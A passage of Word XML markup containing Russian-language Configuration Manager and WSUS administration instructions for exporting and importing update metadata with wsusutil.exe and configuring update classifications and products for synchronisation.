      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Найдите последнюю попытку синхронизации обновлений программного обеспечения и убедитесь в ее успешном завершении.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Важно. Чтобы экспортировать метаданные обновлений программного обеспечения, средство WSUSUtil необходимо запустить локально на сервере экспорта, а чтобы импортировать метаданные обновлений программного обеспечения, это средство нужно запустить на сервере отсоединенной точки обновления программного обеспечения. Кроме того, пользователь, работающий со средством WSUSUtil, должен входить в локальную группу «Администраторы» на каждом сервере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процесс экспорта обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Процесс экспорта обновлений программного обеспечения состоит из двух основных этапов: копирование локально хранящихся файлов условий лицензионного соглашения в отсоединенную точку обновления программного обеспечения и экспорт метаданных обновлений программного обеспечения из базы данных WSUS на сервере экспорта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следующая процедура используется для копирования локальных метаданных условий лицензионного соглашения в отсоединенную точку обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Копирование локальных файлов с сервера экспорта на сервер отсоединенной точки обновления программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На сервере экспорта найдите папку с обновлениями программного обеспечения и условиями лицензионного соглашения для обновления программного обеспечения. По умолчанию службы WSUS хранят файлы в каталоге &lt;установочный_диск_WSUS&gt;\WSUS\WSUSContent\, где установочный_диск_WSUS – это диск, на котором установлены службы WSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скопируйте все файлы и папки из этого расположения в папку WSUSContent на сервере отсоединенной точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следующая процедура используется для экспорта метаданных обновления программного обеспечения из базы данных WSUS на сервере экспорта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Экспорт метаданных обновления программного обеспечения из базы данных WSUS на сервере экспорта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В командной строке на сервере экспорта перейдите в папку, содержащую файл WSUSutil.exe. По умолчанию средство находится в каталоге %ProgramFiles%\Update Services\Tools. Например, если средство находится в расположении по умолчанию, введите cd %ProgramFiles%\Update Services\Tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы экспортировать метаданные обновлений программного обеспечения в файл пакета, введите:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wsusutil.exe export имя_пакета файл_журнала</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wsusutil.exe export export.cab export.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Формат можно интерпретировать следующим образом: за WSUSutil.exe следует параметр экспорта, имя CAB-файла экспорта, созданного во время операции экспорта, и имя файла журнала. Средство WSUSutil.exe экспортирует метаданные с севера экспорта и создает файл журнала для выполненной операции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание Имена файла пакета (CAB-файла) и файла журнала должны быть уникальными в текущей папке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переместите пакет экспорта в папку, содержащую средство WSUSutil.exe, на сервере импорта WSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание. Если переместить пакет в эту папку, операция импорта будет проще. Пакет можно переместить в любое доступное серверу импорта расположение, которое следует указать при выполнении средства WSUSutil.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Импорт метаданных обновлений программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполните следующую процедуру по импорту метаданных обновлений программного обеспечения с сервера экспорта в отсоединенную точку обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Важно. Экспортированные данные необходимо импортировать только из доверенного источника. Импорт содержимого из ненадежного источника может подвергнуть риску безопасность сервера WSUS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Импорт метаданных в базу данных сервера импорта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В командной строке на сервере импорта WSUS перейдите в папку, содержащую файл WSUSutil.exe. По умолчанию средство находится в каталоге %ProgramFiles%\Update Services\Tools. Введите следующее: wsusutil.exe import имя_пакета файл_журнала</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wsusutil</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cab</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Формат можно интерпретировать следующим образом: за WSUSutil.exe следует команда импорта, имя файла пакета (CAB-файла), созданного во время операции экспорта (и путь к файлу пакета, если пакет находится в другой папке), и имя файла журнала. Средство WSUSutil.exe импортирует метаданные с севера экспорта и создает файл журнала для выполненной операции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Классификация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте параметры классификации на странице Классификации мастера или на вкладке Классификации в свойствах компонента точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Страница Классификации мастера доступна, только если вы настраиваете первую точку обновления ПО, заданную на автономном первичном сайте. Эта страница не отображается при установке дополнительных точек обновления ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. При первой установке точки обновления ПО на сайте верхнего уровня очистите все классификации обновлений ПО. После первоначальной синхронизации обновлений настройте классификации из обновленного списка, а затем повторите синхронизацию. Этот параметр настраивается только в точке обновления программного обеспечения на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Продукты. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройте параметры продукта на странице Продукты мастера или на вкладке Продукты в свойствах компонента точки обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Примечание. Страница Продукты мастера доступна, только если вы настраиваете первую точку обновления ПО, заданную на автономном первичном сайте. Эта страница не отображается при установке дополнительных точек обновления ПО. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Совет</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. При первой установке точки обновления ПО на сайте верхнего уровня очистите все продукты. После первоначальной синхронизации обновлений настройте продукты из обновленного списка, а затем повторите синхронизацию. Этот параметр настраивается только в точке обновления программного обеспечения на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 3. Настройка классификаций и продуктов для синхронизации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание. Используйте процедуру из этого раздела только на сайте верхнего уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На шаге 1 был очищен список классификаций и продуктов. На шаге 2 была запущена синхронизация обновлений программного обеспечения с целью обновления списка классификаций и продуктов в Configuration Manager и WSUS. На шаге 3 необходимо выбрать классификации и продукты для синхронизации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполните следующую процедуру по настройке классификаций и продуктов для синхронизации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка классификаций и продуктов для синхронизации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В консоли Configuration Manager щелкните элемент Администрирование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В рабочей области «Администрирование» разверните узел Конфигурация сайта, щелкните узел Сайтыи выберите сайт центра администрирования или автономный первичный сайт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вкладке Главная в группе Параметры выберите Настройка компонентов сайта, а затем щелкните Точка обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На вкладке Классификации укажите классификации обновления программного обеспечения, для которых требуется синхронизировать обновления программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание. Каждое обновление программного обеспечения определяется с помощью классификации обновления, позволяющей упорядочить различные типы обновлений. В процессе синхронизации происходит синхронизация метаданных обновлений ПО для указанных классификаций. Configuration Manager позволяет выполнять синхронизацию обновлений ПО для следующих классификаций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Критические обновления: указывает широкодоступное обновление для решения конкретной проблемы и устранения критической ошибки, не относящейся к системе безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновления определений: указывает обновление для файлов определений вирусов или других файлов определений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пакеты дополнительных компонентов: указывает новые компоненты продуктов, распространяемые вне рамок выпуска продукта и обычно входящие в следующий полный выпуск продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновления для системы безопасности: указывает широкодоступное обновление для решения проблемы, связанной с системой безопасности конкретного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пакеты обновления: указывает накопительный набор исправлений, применяемых к приложению. К таким исправлениям могут относиться обновления для системы безопасности, критические и обычные обновления ПО и т. д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B21A6" w:rsidRPr="00617AC0" w:rsidRDefault="006B21A6" w:rsidP="006B21A6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Средства: указывает служебную программу или компонент для выполнения одной или нескольких задач.</w:t>
      </w:r>
    </w:p>
